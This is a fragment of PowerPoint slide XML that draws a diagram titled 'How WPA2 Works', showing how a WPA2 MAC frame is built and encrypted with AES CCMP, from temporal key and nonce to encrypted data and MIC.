            <a:off x="6762282" y="1910384"/>
            <a:ext cx="5308152" cy="4566066"/>
            <a:chOff x="6367272" y="1733857"/>
            <a:chExt cx="5523684" cy="4657844"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="25" name="Straight Arrow Connector 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C7DA91A-B193-473C-A39B-7689B6C239AC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9326213" y="2318477"/>
              <a:ext cx="0" cy="2057400"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/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Arrow Connector 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E4E5888-E8CD-47A3-8B9F-F780D104ABF8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10070143" y="4304603"/>
              <a:ext cx="6996" cy="1254875"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/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AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28EE9B37-436D-499A-8AA4-3DCD579E7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0742" y="5420171"/>
              <a:ext cx="3523432" cy="642803"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 9727"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="25000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln w="28575" cap="rnd" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:prstDash val="sysDot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28" name="Straight Arrow Connector 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{140C417A-007F-4928-AD29-86F4EC357FE9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="9326213" y="5069537"/>
              <a:ext cx="9043" cy="489941"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/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Arrow Connector 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB80375A-59D0-442D-93DC-8470ADD94CEC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:endCxn id="47" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7124963" y="3513502"/>
              <a:ext cx="13153" cy="488357"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/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0" name="Picture 29" descr="one1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61BED1B1-6034-46FC-9073-BCEFD24266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duotone>
                <a:schemeClr val="accent5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945286" y="4370778"/>
              <a:ext cx="769887" cy="7619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31" name="Straight Arrow Connector 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C179F39-26D3-4F96-A002-854CFC7729CE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8854447" y="3946686"/>
              <a:ext cx="921713" cy="3613"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/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Arrow Connector 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70D9BB57-FA4C-48C3-855C-340882FCA538}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7369777" y="4180506"/>
              <a:ext cx="2403553" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/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Arrow Connector 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A80007E-8D1E-4766-A74C-6F8531032E00}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="43" idx="2"/>
              <a:endCxn id="37" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10070461" y="2350835"/>
              <a:ext cx="6360" cy="1411186"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/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Elbow Connector 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00D1771D-03AC-4990-A1FC-9A3E06BDDBD8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="10026150" y="4539166"/>
              <a:ext cx="1325880" cy="714743"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val -2207"/>
              </a:avLst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7" name="Picture 36" descr="one2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6B01715-C7C5-43B3-AA49-9B373CCF2D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2244" y="3762021"/>
              <a:ext cx="636433" cy="62872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8" name="Picture 37" descr="one1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{685A39E1-1D78-4665-A126-D387851A63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duotone>
                <a:schemeClr val="accent5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169820" y="2789610"/>
              <a:ext cx="770861" cy="76286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3" name="AutoShape 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E2321EE-5F78-4C6A-8634-63936E71D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88124" y="1974627"/>
              <a:ext cx="1177393" cy="376208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4" name="AutoShape 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D746B13-CD28-4441-B2C4-AA7A96B6B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89108" y="1974627"/>
              <a:ext cx="431826" cy="376208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5" name="Straight Arrow Connector 44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3AE45DD-9D84-48ED-8910-11D537D7B24E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8565456" y="3549652"/>
              <a:ext cx="0" cy="209005"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/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AutoShape 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF025F98-E6AA-4D68-A1E2-DA836FBF7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80868" y="3751429"/>
              <a:ext cx="1177393" cy="376208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7" name="AutoShape 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{541EEEBB-600B-4BFD-BEFF-F123BB15F9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1995" y="4001860"/>
              <a:ext cx="452242" cy="376208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0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8" name="Straight Arrow Connector 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E328A868-BDB1-4E94-AA00-3639CC6B4F9E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7117173" y="1973774"/>
              <a:ext cx="1" cy="998087"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/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Elbow Connector 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAAE5AE9-D07E-48F4-B851-9A13D8041367}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="7902179" y="2123637"/>
              <a:ext cx="609795" cy="728953"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val -3204"/>
              </a:avLst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AutoShape 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52CFABDB-F1CA-404F-A47B-8F3707423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7272" y="1974627"/>
              <a:ext cx="1499073" cy="376208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1" name="AutoShape 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3C9D931-D2BA-4BB3-85D2-CD010CB46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0388" y="5552698"/>
              <a:ext cx="888270" cy="376208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90F5E3E3-528D-49C7-93FE-FE7EBE6BE3C2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8259996" y="5516219"/>
              <a:ext cx="757272" cy="47094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MAC Header</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="AutoShape 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEC6E420-6E57-437C-8A44-2AA5C85E4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2729" y="5552698"/>
              <a:ext cx="588362" cy="376208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90AC5B90-F965-40BE-9B61-D9BFCB3EBD4A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9065722" y="5516219"/>
              <a:ext cx="682374" cy="47094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CCMP Header</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55" name="AutoShape 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BBE8017-A706-4E03-8DED-0FC0DDE62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40108" y="5552698"/>
              <a:ext cx="819260" cy="376208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6" name="AutoShape 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{084E0160-8AF1-4B9F-B22A-65185A6CA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8949" y="5570376"/>
              <a:ext cx="781578" cy="135853"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 38001"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="bg1">
                    <a:alpha val="75000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="bg1">
                    <a:gamma/>
                    <a:tint val="0"/>
                    <a:invGamma/>
                    <a:alpha val="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7" name="AutoShape 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BEBCDE3-999B-4152-A67D-B8D4B0E47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03105" y="5552698"/>
              <a:ext cx="888270" cy="376208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22FE4FD-C38F-4F26-B1E7-5DD169EFA0C3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10634417" y="5516217"/>
              <a:ext cx="867378" cy="47094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Encrypted MIC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DD3B0B64-EE76-4264-ACB9-830D454345BF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6620614" y="2021448"/>
              <a:ext cx="1032683" cy="28256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MAC Header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0BD6C055-B5AD-4150-B4EB-699C569EDD98}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9025210" y="2021447"/>
              <a:ext cx="382326" cy="28256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PN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6AAEE95A-1953-4845-AC7C-2408A081C411}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7494324" y="1733857"/>
              <a:ext cx="1511176" cy="439548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Priority destination address</a:t>
              </a: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4EC017A0-7B9D-45F7-8D67-3D992E7D70A4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6784444" y="2971862"/>
              <a:ext cx="700538" cy="626154"/>
              <a:chOff x="2319883" y="2995597"/>
              <a:chExt cx="612974" cy="547888"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="82" name="Picture 81" descr="one2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D8A9F7B-DBE2-44A4-AB44-7B2673FEFC38}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr preferRelativeResize="0">
                <a:picLocks noChangeArrowheads="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5" cstate="print">
                <a:duotone>
                  <a:schemeClr val="accent6">
                    <a:shade val="45000"/>
                    <a:satMod val="135000"/>
                  </a:scheme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6758" y="2995597"/>
                <a:ext cx="556449" cy="54788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2BF60FE7-96B0-4515-8DBB-FF99B81D2101}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2319883" y="3068203"/>
                <a:ext cx="612974" cy="412079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Build AAD</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grp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5CCE9EC0-C99B-4A18-BC43-2227E3DF8E80}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8225547" y="2931136"/>
              <a:ext cx="644479" cy="47094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Build Nonce</a:t>
              </a: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FB55A52D-5CB3-46DB-927D-8EB94414BF35}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6900909" y="4048681"/>
              <a:ext cx="487417" cy="28256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AAD</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="Rectangle 66">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B97BBAAC-2FAF-4BCB-B5D0-68EE9A349599}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8255215" y="3790401"/>
              <a:ext cx="654226" cy="29826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Nonce</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp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642D9A1F-A3A0-4ABC-BD02-B09667468366}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9557269" y="2021449"/>
              <a:ext cx="1089598" cy="28256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Temporal Key</a:t>
              </a:r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AE1E88AC-31D0-46CD-8988-29329C519450}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9763856" y="3835499"/>
              <a:ext cx="613221" cy="4709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AES CCMP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="72" name="Elbow Connector 52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06C7AD1E-9A37-40DD-8B70-92DA3250748A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="44" idx="2"/>
              <a:endCxn id="38" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="8662747" y="2628769"/>
              <a:ext cx="820209" cy="264340"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector2">
              <a:avLst/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Elbow Connector 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5EEF8A6-B211-4F82-BCE9-31EE4DCD44C2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="9961947" y="2668790"/>
              <a:ext cx="1645920" cy="906377"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector2">
              <a:avLst/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D649EA5D-C1B9-42B7-892B-69343E740900}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8868883" y="6077738"/>
              <a:ext cx="1927150" cy="31396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WPA2 MAC Frame</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="75" name="AutoShape 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C1C5A92-290F-467C-8A36-39E5DC7F4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06358" y="1974627"/>
              <a:ext cx="1177393" cy="376208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19050">
              <a:solidFill>
                <a:srgbClr val="FFC000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6" name="AutoShape 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6A2BFC0-E6B3-4AB0-A4B4-E81026A1A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30742" y="1995059"/>
              <a:ext cx="1128625" cy="129615"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 32280"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="bg1">
                    <a:alpha val="75000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="bg1">
                    <a:gamma/>
                    <a:tint val="0"/>
                    <a:invGamma/>
                    <a:alpha val="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5EAA0F0A-CBED-4791-9787-5DA19285545C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10763593" y="2021449"/>
              <a:ext cx="1127363" cy="28256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Plaintext Data</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="79" name="Elbow Connector 64">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{672666BE-793D-41BA-955C-E37AE709A3D7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="5662018" y="3232256"/>
              <a:ext cx="3368256" cy="1672037"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector2">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:schemeClr val="tx1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D113499B-0346-4F98-AEDD-5555FAEB3FC6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9734090" y="5516218"/>
              <a:ext cx="858593" cy="4709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Encrypted Data</a:t>
              </a:r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3ADDD4E6-A52B-4E4C-AD0B-9B098054EB8E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8980178" y="4436047"/>
              <a:ext cx="707807" cy="65932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Build CCMP header</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="Rectangle 85">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FB1B8AD-3D97-4CD2-8B5B-26338A8594E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8196820" y="1341457"/>
            <a:ext cx="2902414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itchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>How WPA2 Works</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" b="0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35F3DAAD-AAB1-4B9F-B899-1D383430A0FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1539213" y="3714722"/>
            <a:ext cx="558806" cy="558806"/>
            <a:chOff x="1539213" y="3710365"/>
            <a:chExt cx="558806" cy="558806"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="97" name="Oval 96"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1539213" y="3710365"/>
              <a:ext cx="558806" cy="558806"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent4"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx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7" name="Freeform 139">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A061E3C5-068F-4B29-A3DA-BA4C2553A0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6221" y="3847369"/>
              <a:ext cx="303213" cy="261173"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 168021 w 50"/>
                <a:gd name="T1" fmla="*/ 168021 h 50"/>
                <a:gd name="T2" fmla="*/ 164592 w 50"/>
                <a:gd name="T3" fmla="*/ 171450 h 50"/>
                <a:gd name="T4" fmla="*/ 147447 w 50"/>
                <a:gd name="T5" fmla="*/ 171450 h 50"/>
                <a:gd name="T6" fmla="*/ 137160 w 50"/>
                <a:gd name="T7" fmla="*/ 164592 h 50"/>
                <a:gd name="T8" fmla="*/ 6858 w 50"/>
                <a:gd name="T9" fmla="*/ 34290 h 50"/>
                <a:gd name="T10" fmla="*/ 0 w 50"/>
                <a:gd name="T11" fmla="*/ 24003 h 50"/>
                <a:gd name="T12" fmla="*/ 0 w 50"/>
                <a:gd name="T13" fmla="*/ 6858 h 50"/>
                <a:gd name="T14" fmla="*/ 0 w 50"/>
                <a:gd name="T15" fmla="*/ 3429 h 50"/>
                <a:gd name="T16" fmla="*/ 6858 w 50"/>
                <a:gd name="T17" fmla="*/ 0 h 50"/>
                <a:gd name="T18" fmla="*/ 6858 w 50"/>
                <a:gd name="T19" fmla="*/ 0 h 50"/>
                <a:gd name="T20" fmla="*/ 120015 w 50"/>
                <a:gd name="T21" fmla="*/ 51435 h 50"/>
                <a:gd name="T22" fmla="*/ 171450 w 50"/>
                <a:gd name="T23" fmla="*/ 164592 h 50"/>
                <a:gd name="T24" fmla="*/ 168021 w 50"/>
                <a:gd name="T25" fmla="*/ 168021 h 50"/>
                <a:gd name="T26" fmla="*/ 106299 w 50"/>
                <a:gd name="T27" fmla="*/ 168021 h 50"/>
                <a:gd name="T28" fmla="*/ 99441 w 50"/>
                <a:gd name="T29" fmla="*/ 171450 h 50"/>
                <a:gd name="T30" fmla="*/ 85725 w 50"/>
                <a:gd name="T31" fmla="*/ 171450 h 50"/>
                <a:gd name="T32" fmla="*/ 75438 w 50"/>
                <a:gd name="T33" fmla="*/ 164592 h 50"/>
                <a:gd name="T34" fmla="*/ 6858 w 50"/>
                <a:gd name="T35" fmla="*/ 96012 h 50"/>
                <a:gd name="T36" fmla="*/ 0 w 50"/>
                <a:gd name="T37" fmla="*/ 85725 h 50"/>
                <a:gd name="T38" fmla="*/ 0 w 50"/>
                <a:gd name="T39" fmla="*/ 68580 h 50"/>
                <a:gd name="T40" fmla="*/ 3429 w 50"/>
                <a:gd name="T41" fmla="*/ 65151 h 50"/>
                <a:gd name="T42" fmla="*/ 6858 w 50"/>
                <a:gd name="T43" fmla="*/ 61722 h 50"/>
                <a:gd name="T44" fmla="*/ 6858 w 50"/>
                <a:gd name="T45" fmla="*/ 61722 h 50"/>
                <a:gd name="T46" fmla="*/ 75438 w 50"/>
                <a:gd name="T47" fmla="*/ 96012 h 50"/>
                <a:gd name="T48" fmla="*/ 109728 w 50"/>
                <a:gd name="T49" fmla="*/ 164592 h 50"/>
                <a:gd name="T50" fmla="*/ 106299 w 50"/>
                <a:gd name="T51" fmla="*/ 168021 h 50"/>
                <a:gd name="T52" fmla="*/ 24003 w 50"/>
                <a:gd name="T53" fmla="*/ 171450 h 50"/>
                <a:gd name="T54" fmla="*/ 0 w 50"/>
                <a:gd name="T55" fmla="*/ 147447 h 50"/>
